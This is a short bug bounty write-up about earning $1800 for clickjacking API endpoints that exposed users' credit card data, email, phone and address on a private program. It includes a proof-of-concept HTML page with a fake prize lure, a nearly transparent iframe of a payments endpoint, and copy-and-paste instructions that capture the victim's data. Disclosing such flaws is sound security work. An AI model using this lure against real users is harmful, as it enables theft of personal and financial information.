$1800 worth Clickjacking

Osama Avvan
Jun 21 · 2 min read

In this writeup, I will talk about how I earned a total of $1800 by exploiting Clickjacking on pages where User sensitive information was disclosed, It was a private program on Bugcorwd.

So there were some API endpoints, which were disclosing User Information like Credit Card Data, Email, Name, Phone, Address, User Id, etc.





Now as there was no X-FRAME Header on any of these endpoints so I was able to load them in an IFRAME.

Now I had to create an HTML page to trick the user into stealing their Information. So I created an HTML page.


<!DOCTYPE html>

<div id=”parent”>

<center><h1 style=”color: blue; text-decoration: underline;”>Lucky Draw to Win $100</h1></center>

<h3>Click inside the box and Press CTRL+A then CTRL+C</h3>

<div style=”border: 2px solid gray;”>
<iframe src=”https://example.com/api/v1/wallet/payments?language=en" width=”100%” style=”opacity: 0.01"></iframe>


<h3>Click inside the box and press CTRL+V</h3>
<input type=”password” name=”” size=”1">
<! — <textarea rows=”1" cols=”1" style=”resize: none;”></textarea> →
<button id=”btn”>Click to Win</button>



document.querySelector(“#btn”).onclick = function() {
alert(“Congratulation! You have won $100”)


Now after performing all the steps when the user will click on the Button, his/her information will be logged in the console.

So that was it, Thank you for Reading.

Osama Avvan

Written by

Security Researcher, ❤️ To Code. Find me at: https://twitter.com/osamaavvan https://facebook.com/cyber.spidey